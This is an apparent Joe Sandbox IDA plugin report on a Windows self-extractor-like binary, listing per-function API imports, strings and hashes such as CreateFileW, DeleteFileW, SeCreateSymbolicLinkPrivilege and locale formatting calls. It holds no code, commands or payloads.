
Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: c6a77248ea03d1614b6de6d188a29797905d6d06331f70bcbd1b81a9c3fa42d9
Instruction ID: eb56a5d1e08eba207e5fd5f5c352e92a8029095402cc1455009fba38267e597d
Opcode Fuzzy Hash: c6a77248ea03d1614b6de6d188a29797905d6d06331f70bcbd1b81a9c3fa42d9
Instruction Fuzzy Hash: B7919372248348BBD621EBA4CC89FFB7BACFB89704F044919F645D6181D775AA048B63

Uniqueness

Uniqueness Score: -1.00%

Function 00886FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00886FAA
_wcslen.LIBCMT ref: 00887013
_wcslen.LIBCMT ref: 00887084

Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00

Part of subcall function 0088A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641,000000FF), ref: 0088A1F1
Part of subcall function 0088A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641), ref: 0088A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00887139
CloseHandle.KERNEL32(00000000), ref: 00887155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00887298

Part of subcall function 00889DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008873BC,?,?,?,00000000), ref: 00889DBC
Part of subcall function 00889DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00889E70

Part of subcall function 00889620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008895D6,?,?,?,?,?,008B2641,000000FF), ref: 0088963B

Part of subcall function 0088A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
Part of subcall function 0088A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532

Strings

\??\, xrefs: 0088702B
SeRestorePrivilege, xrefs: 00886FC2
UNC\, xrefs: 00887051
SeCreateSymbolicLinkPrivilege, xrefs: 00886FCC

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: 6abd1651cb7eccb87b680f4d4a94299f436a8203315b13eef9b51b697b8ee86e
Instruction ID: d65c7cce2a0828ee2565dcc6bb27b8efd443ea9b43f9450444bd7372c8713cda
Opcode Fuzzy Hash: 6abd1651cb7eccb87b680f4d4a94299f436a8203315b13eef9b51b697b8ee86e
Instruction Fuzzy Hash: 47C1D771904644AAEB25FB78CC85FEEB7B8FF04300F14455AF956E3282D774EA448B62

Uniqueness

Uniqueness Score: -1.00%

Function 008AD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 008ADA34

Strings

1#SNAN, xrefs: 008AEC33
1#INF, xrefs: 008AEC41
1#QNAN, xrefs: 008AEC3A
1#IND, xrefs: 008AEC2C

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 385b8f8b08dff58d7584e08446b0aef45c6e61009acfcaa8a6522a0c2c41a583
Instruction ID: 8c5488301edb0145e8e6045d2943c7553b9d5161de683308fe888a616fbc3f48
Opcode Fuzzy Hash: 385b8f8b08dff58d7584e08446b0aef45c6e61009acfcaa8a6522a0c2c41a583
Instruction Fuzzy Hash: A4C24C71E046288FEB25CE28DD407EAB7B5FB4A314F1445EAD44EE7641E778AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 008832F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00883300
_swprintf.LIBCMT ref: 008836C7

Strings

h%u, xrefs: 008836BC
hc%u, xrefs: 0088370A
CMT, xrefs: 00883A17

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: e1c04f6f4fb89184b8fc0516c37fa14a2f90f37e6922cd6af34aeab7884f3ec6
Instruction ID: 3f0150330731a6bad37362189747830181cfed63d4de8b56c3b18f4df850ef3e
Opcode Fuzzy Hash: e1c04f6f4fb89184b8fc0516c37fa14a2f90f37e6922cd6af34aeab7884f3ec6
Instruction Fuzzy Hash: 9632D371510684ABDF14EF78C895AE93BA5FF15700F08047DFD8ACB286DB749A49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0088286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00882874
_strlen.LIBCMT ref: 00882E3F

Part of subcall function 008902BA: __EH_prolog.LIBCMT ref: 008902BF

Part of subcall function 00891B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0088BAE9,00000000,?,?,?,0001042C), ref: 00891BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00882F91

Strings

CMT, xrefs: 00882FBC

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 151a1c7c36b1a44acee8fd3126023eb117a4e48cb275083f137658a073984246
Instruction ID: 2edd658bb5abc5399994902aa3d08096dcf3212fe1d31b3a76bf0fd9ddd915bb
Opcode Fuzzy Hash: 151a1c7c36b1a44acee8fd3126023eb117a4e48cb275083f137658a073984246
Instruction Fuzzy Hash: F86215715006458FDF29EF38C885AEA3BA1FF54310F08457EEC9ACB286DB75A945CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0089F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0089F844
IsDebuggerPresent.KERNEL32 ref: 0089F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0089F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0089F93A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e9bfdd7ab57fb0808d25c7a14b7ea388011cc12a5ead4a8ec424333088c2fc72
Instruction ID: 2ee7afa7ede5a7b3a2889a4593335866eaad5060ab292bddeea6bf23f6dcd1ac
Opcode Fuzzy Hash: e9bfdd7ab57fb0808d25c7a14b7ea388011cc12a5ead4a8ec424333088c2fc72
Instruction Fuzzy Hash: DB310775D052199BDF20EFA4D9897CCBBB8FF08304F1041AAE50CEB251EB719A848F45

Uniqueness

Uniqueness Score: -1.00%

Function 0089E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0089E5E8,0000001C,0089E7DD,00000000,?,?,?,?,?,?,?,0089E5E8,00000004,008E1CEC,0089E86D), ref: 0089E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0089E5E8,00000004,008E1CEC,0089E86D), ref: 0089E6CF

Strings

D, xrefs: 0089E6C3

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 9df215dfa1952836f1d22f05ee145d4e0b4cc2aca5837ef7ec69c74232636c61
Instruction ID: d64cebfc67bee823239afa1b0638eb968152cce4e44c016b4bd1761d1469eb06
Opcode Fuzzy Hash: 9df215dfa1952836f1d22f05ee145d4e0b4cc2aca5837ef7ec69c74232636c61
Instruction Fuzzy Hash: 9201D432600109ABDF14EE69DC49ADD7BAEFFC4324F0CC224ED19D6150E634D9058680

Uniqueness

Uniqueness Score: -1.00%

Function 008A8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008A8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008A8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 008A8FCC

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 923cca5a9492771c98344db2ad939740f94662dece43dd87433da693b19e4091
Instruction ID: 94af7a97742f8acdabd79dd8e72ae021220a7d875f429fc00eae1544dd1bc90c
Opcode Fuzzy Hash: 923cca5a9492771c98344db2ad939740f94662dece43dd87433da693b19e4091
Instruction Fuzzy Hash: 6F31B775901219ABCB21DF68D88979DBBB8FF08310F5042EAE41CE6251EB709F858F55

Uniqueness

Uniqueness Score: -1.00%

Function 008AB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 008AB4DB

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: e6d1d37b230826515efb311c4f495b72c612a2dff0d4260dff60ceb004de1500
Instruction ID: 155f40e29e6cefab636a5587c63946f4551818c674066c1225bb022ec19a3086
Opcode Fuzzy Hash: e6d1d37b230826515efb311c4f495b72c612a2dff0d4260dff60ceb004de1500
Instruction Fuzzy Hash: D6310471900249AFEB249E78CC84EFA7BBDFB86314F0402A8E918D7653E7309E458B50

Uniqueness

Uniqueness Score: -1.00%

Function 008AD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: e516d18259b8a9e3ebfacdea09bcc80e99fe788ca3d8fc98b8e9531d8f7f5298
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: CE021B71E012199BEF18CFA9C8806ADB7F1FF49314F258269D91AE7780D734AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0089AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0089AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,008BE72C,?,?), ref: 0089AF84

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 06d03dbc1c63d3cbc8754fb310078970e888b81d75b6c1bd4f31a989198198e7
Instruction ID: f5ce55e7f9cd41c6b9bad41a3bb9fb3336ab3332e9cc9085e0bb81200169e087
Opcode Fuzzy Hash: 06d03dbc1c63d3cbc8754fb310078970e888b81d75b6c1bd4f31a989198198e7
Instruction Fuzzy Hash: B3015E7A150318AED7109F64DC45FDA77BCFF09710F009122FB05D7251D7749A258BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00886C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00886DDF,00000000,00000400), ref: 00886C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00886C95

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: dd86ff53234f312106b26fca3973d5a37ed87c093991b0c89d67746fc20b6c77
Instruction ID: c7fc30f56ceea005351404bbedd4a4c690440457acbaf591a1137805211fae7d
Opcode Fuzzy Hash: dd86ff53234f312106b26fca3973d5a37ed87c093991b0c89d67746fc20b6c77
Instruction Fuzzy Hash: ECD0C971348304BFFA112B618E06F2A7B9AFF45B52F18C504B795E80F0DA749425A729

Uniqueness

Uniqueness Score: -1.00%

Function 008B19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008B19EF,?,?,00000008,?,?,008B168F,00000000), ref: 008B1C21

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 94931b7d853650773ffb3e62da2907475b18e1986891336be4bfb1847906968d
Instruction ID: ee4f1a8304cbe526a02ea2968f24610ec7767e552b6c088bd56c29c9351afa74
Opcode Fuzzy Hash: 94931b7d853650773ffb3e62da2907475b18e1986891336be4bfb1847906968d
Instruction Fuzzy Hash: 36B11A31610609DFDB19CF28C4AABA57BE0FF45364F658658E899CF3A1C335E991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0089F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0089F66A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: bfa60060212cd00f96157c73c3ae470caac0f73a466f880556cc0eabad22d203
Instruction ID: d5739d80ec4ef442483005ce22e10e4fbfb3d43f9fb7a75d4af8107697b78cc1
Opcode Fuzzy Hash: bfa60060212cd00f96157c73c3ae470caac0f73a466f880556cc0eabad22d203
Instruction Fuzzy Hash: 25518EB1A006499FEF68CF98EC857AEBBF4FB48354F28853AD501EB251D3749900CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0088B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0088B16B

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: f383bc62306dd65147a1abe44732659cdb61db0bc5e0835b9ae1946584a8dfad
Instruction ID: bd2fcbcb336574490e3ad2e96957f4a5847500ea90626a3d6a328d23daab4c58
Opcode Fuzzy Hash: f383bc62306dd65147a1abe44732659cdb61db0bc5e0835b9ae1946584a8dfad
Instruction Fuzzy Hash: 8BF030B8D00A088FDB18DF18ED99AD977F1FB99715F104295D51593390C770AD818F60

Uniqueness

Uniqueness Score: -1.00%

Function 008840FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 008841BC

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 7cae43384f8f068cd217833c0fc0db49b57b08a288af66eae8af549140a68ce0
Instruction ID: f5ec70b93cbf89d2f854f10d5a84d72ed54f359ac52425130ccb45caf309faee
Opcode Fuzzy Hash: 7cae43384f8f068cd217833c0fc0db49b57b08a288af66eae8af549140a68ce0
Instruction Fuzzy Hash: 95C147B6A083418FC354CF29D88065AFBE1BFC9308F59892DE998D7311D734E948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 0089F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0089F3A5), ref: 0089F9DA

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: da88e879de842cec0d8845de4f1016e976e1fe55220df5887e11b895e8771f4d
Instruction ID: 58168840b237e9f55f740707fce668cca349477047b2302565ba77c4a384e520
Opcode Fuzzy Hash: da88e879de842cec0d8845de4f1016e976e1fe55220df5887e11b895e8771f4d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 008AC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 008AC030

Memory Dump Source

